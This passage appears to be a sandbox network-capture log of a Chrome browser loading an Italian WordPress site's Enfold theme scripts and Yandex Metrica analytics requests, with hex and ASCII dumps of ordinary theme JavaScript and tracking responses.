                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:08 UTC275INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:08 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 706
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:08 UTC706INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 09 2f 2f 20 74 65 73 74 69 6d 6f 6e 69 61 6c 20 73 68 6f 72 74 63 6f 64 65 20 6a 61 76 61 73 63 72 69 70 74 0a 09 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                                                              Data Ascii: (function($){ "use strict";// -------------------------------------------------------------------------------------------// testimonial shortcode javascript// -------------------------------------------------------------------------------------


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              141192.168.2.164987389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:07 UTC562OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullscreen/slideshow_fullscreen.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:08 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:08 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 5625
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:08 UTC5625INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 46 75 6c 6c 73 63 72 65 65 6e 20 53 6c 69 64 65 73 68 6f 77 20 0a 2f 2f 20 0a 2f 2f 20 65 78 74 65 6e 64 73 20 61 76 69 61 20 73 6c 69 64 65 73 68 6f 77 20 73 63 72 69 70 74 20 77 69 74 68 20 61 20 6d 6f 72 65 20 73 6f 70 68 69 73 74 69 63 61 74 65 64 20 70 72 65 6c 6f 61 64 65 72 20 61 6e 64 20 66 69 78 65 64 20 73 69 7a 65 20 66 6f 72 20 73 6c 69 64 65 72 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Fullscreen Slideshow // // extends avia slideshow script with a more sophisticated preloader and fixed size for slider// ---------------------------------


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              142192.168.2.164987189.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:07 UTC546OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow-video.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:08 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:08 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 23077
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:08 UTC16107INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 0a 2f 2f 20 41 56 49 41 20 56 49 44 45 4f 20 41 50 49 20 2d 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 79 6f 75 74 75 62 65 2c 20 76 69 6d 65 6f 20 61 6e 64 20 68 74 6d 6c 20 35 20 75 73 65 20 74 68 65 20 73 61 6d 65 20 69 6e 74 65 72 66 61 63 65 0a 2f 2f 20 0a 2f 2f 20 72 65 71 75 69 72 65 73 20 66 72 6f 6f 67 61 6c 6f 6f 70 20 76 69 6d 65 6f 20 6c 69 62 72 61 72 79 20 61 6e 64 20 79 6f 75 74 75 62 65 20 69 66 72 61 6d 65 20 61 70 69 20 28 79 74 20 63 61 6e 20
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// // AVIA VIDEO API - make sure that youtube, vimeo and html 5 use the same interface// // requires froogaloop vimeo library and youtube iframe api (yt can
                                                                                                                                              2025-01-03 16:33:08 UTC6970INData Raw: 63 74 69 6f 6e 20 77 68 65 6e 20 74 68 65 20 6d 65 74 68 6f 64 20 72 65 74 75 72 6e 73 20 61 20 76 61 6c 75 65 2e 0a 20 20 20 20 20 20 20 20 20 2a 2f 0a 20 20 20 20 20 20 20 20 61 70 69 3a 20 66 75 6e 63 74 69 6f 6e 28 6d 65 74 68 6f 64 2c 20 76 61 6c 75 65 4f 72 43 61 6c 6c 62 61 63 6b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 74 68 69 73 2e 65 6c 65 6d 65 6e 74 20 7c 7c 20 21 6d 65 74 68 6f 64 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 65 6c 66 20 3d 20 74 68 69 73 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 6c 65 6d 65 6e 74 20 3d 20 73 65 6c 66 2e 65 6c 65 6d 65 6e
                                                                                                                                              Data Ascii: ction when the method returns a value. */ api: function(method, valueOrCallback) { if (!this.element || !method) { return false; } var self = this, element = self.elemen


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              143192.168.2.164987577.88.21.1194436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:07 UTC1968OUTGET /watch/99162160/1?wmode=7&page-url=https%3A%2F%2Fwww.cipassoitalia.it%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.132%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.132%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.132%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A1370925244722%3Ahid%3A679857121%3Az%3A-300%3Ai%3A20250103113304%3Aet%3A1735921984%3Ac%3A1%3Arn%3A888462558%3Arqn%3A1%3Au%3A1735921984342483081%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A15621%3Awv%3A2%3Ads%3A86%2C715%2C461%2C117%2C777%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1735921964729%3Arqnl%3A1%3Ast%3A1735921986%3At%3ACiPASSO.%20Nel%20cuore%20di%20Roma%2C%20ad%20un%20passo%20dal%20Pantheon.&t=gdpr%2814%29clc%280-0-0%29rqnt%281 [TRUNCATED]
                                                                                                                                              Host: mc.yandex.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: i=narlABsq63nROyU6LhKlC/QyBgl1C5gTK9qc3JdRc3H3zDytph2vBN10ZgqZgH/k820S88p65t19wIhYvE7/vXqicU8=; yandexuid=8563067781735921985; yashr=2978277861735921985; yabs-sid=814606481735921986; yuidss=8563067781735921985; ymex=1767457986.yrts.1735921986; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzMiIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzIiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzMiIi
                                                                                                                                              2025-01-03 16:33:08 UTC720INHTTP/1.1 200 Ok
                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                              Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                              Connection: Close
                                                                                                                                              Content-Length: 539
                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:08 GMT
                                                                                                                                              Expires: Fri, 03-Jan-2025 16:33:08 GMT
                                                                                                                                              Last-Modified: Fri, 03-Jan-2025 16:33:08 GMT
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              2025-01-03 16:33:08 UTC539INData Raw: 7b 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 61 75 74 6f 5f 67 6f 61 6c 73 22 3a 30 2c 22 62 75 74 74 6f 6e 5f 67 6f 61 6c 73 22 3a 30 2c 22 63 5f 72 65 63 70 22 3a 22 31 2e 30 30 30 30 30 22 2c 22 66 6f 72 6d 5f 67 6f 61 6c 73 22 3a 30 2c 22 70 63 73 22 3a 22 31 22 2c 22 77 65 62 76 69 73 6f 72 22 3a 7b 22 61 72 63 68 5f 74 79 70 65 22 3a 22 6e 6f 6e 65 22 2c 22 64 61 74 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 32 20 30 31 3a 32 38 3a 32 35 22 2c 22 66 6f 72 6d 73 22 3a 31 2c 22 72 65 63 70 22 3a 22 31 2e 30 30 30 30 30 22 7d 2c 22 73 62 70 22 3a 20 7b 22 61 22 3a 22 35 57 34 51 44 38 4d 5a 6b 45 67 45 42 6d 36 41 62 49 70 6f 7a 2b 79 6f 7a 4f 50 78 59 58 45 42 61 47 77 48 39 71 55 75 32 50 51 31 50 4d 4b 32 31 78 4f 72 4b 67 48 33 42 6f 79 69 74 71 41 30 22
                                                                                                                                              Data Ascii: {"settings":{"auto_goals":0,"button_goals":0,"c_recp":"1.00000","form_goals":0,"pcs":"1","webvisor":{"arch_type":"none","date":"2024-12-22 01:28:25","forms":1,"recp":"1.00000"},"sbp": {"a":"5W4QD8MZkEgEBm6AbIpoz+yozOPxYXEBaGwH9qUu2PQ1PMK21xOrKgH3BoyitqA0"


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              144192.168.2.164987289.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:08 UTC719OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/timeline/timeline.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:08 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:08 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 6521
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:08 UTC6521INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 41 76 69 61 20 54 69 6d 65 6c 69 6e 65 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 20 20 24 28 77 69 6e 64 6f 77
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Avia Timeline// -------------------------------------------------------------------------------------------(function($) { "use strict"; $(window


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              145192.168.2.164987489.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:08 UTC717OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/toggles/toggles.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:08 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:08 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 4724
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:32 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:08 UTC4724INData Raw: 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 54 6f 67 67 6c 65 20 73 68 6f 72 74 63 6f 64 65 20 6a 61 76 61 73 63 72 69 70 74 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 20 0a 09 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09
                                                                                                                                              Data Ascii: // -------------------------------------------------------------------------------------------// Toggle shortcode javascript// -------------------------------------------------------------------------------------------(function($){ "use strict";


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              146192.168.2.164987689.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:08 UTC564OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_layerslider/slideshow_layerslider.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c; _ym_uid=1735921984342483081; _ym_d=1735921984
                                                                                                                                              2025-01-03 16:33:08 UTC275INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:08 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 849
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:31 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:08 UTC849INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 09 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 2f 2f 20 6d 61 6b 65 73 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 66 69 78 65 64 20 63 6f 6e 74 61 69 6e 65 72 20 68 65 69 67 68 74 20 69 73 20 72 65 6d 6f 76 65 64 20 6f 6e 63 65 20 74 68 65 20 6c 61 79 65 72 73 6c 69 64 65 72 20 69 73 20 6c 6f 61 64 65 64 2c 20 73 6f 20 69 74 20 61 64 61 70 74 73 20 74 6f 20 74 68 65 20 73 63 72 65 65 6e 20 72 65 73 6f 6c 75 74 69 6f 6e 0a 2f 2f
                                                                                                                                              Data Ascii: (function($){"use strict";// -------------------------------------------------------------------------------------------// makes sure that the fixed container height is removed once the layerslider is loaded, so it adapts to the screen resolution//


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              147192.168.2.164987777.88.21.1194436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:08 UTC899OUTGET /sync_cookie_image_start?redirect_domain=mc.yandex.com&token=10611.THIYYAEe98v2mU_77etvw6y980yLbM-16KV3AOlKlsqX0zDes6MVlFAFoFiiYNqR.FjbGmflqlBBumniBfAOlX96YIeU%2C HTTP/1.1
                                                                                                                                              Host: mc.yandex.ru
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: i=MWn/b3CGBdGz4xwo6ybs8zuB0m6dqTWEZs6SfrZEPLGuS1njVyPf5dksYDS0w6MqEEVqybkB7y6BVJBOmOuiQIuKgyY=; yandexuid=5258352291735921983; yashr=2056106971735921983
                                                                                                                                              2025-01-03 16:33:09 UTC673INHTTP/1.1 302 Moved temporarily
                                                                                                                                              Connection: Close
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:09 GMT
                                                                                                                                              Location: https://mc.yandex.com/sync_cookie_image_decide?token=10611.DeDvDEkh2b6Its9xbNfPHxCK1804kA6_zZJVWLPPWz07-944RJ_J0kYNra_afEkwU03UV0CHnydP5no6KoQ54vkblvuIBsG-969Amgl-cxtmyCk1lkokidjPnkQ91qsTV1SpIOp7NPyr1RezhjfwvFpEDIXtlvS0spqHmtROf1O5xs8i-DVaMexQjDa336P2d5ZAuPOBzBztdoOKKJl7_8M1xV-u-PMh4JytiHCpED4%2C.xOk8KZm_JWiARvYJ6YX-7hS6gpY%2C
                                                                                                                                              Set-Cookie: sync_cookie_csrf=1157316890fake; Expires=Fri, 03-Jan-2025 16:43:09 GMT; Domain=.mc.yandex.ru; Path=/; SameSite=None; Secure
                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                              2025-01-03 16:33:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              148192.168.2.164987889.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:08 UTC713OUTGET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/video/video.js?ver=6.0.9 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
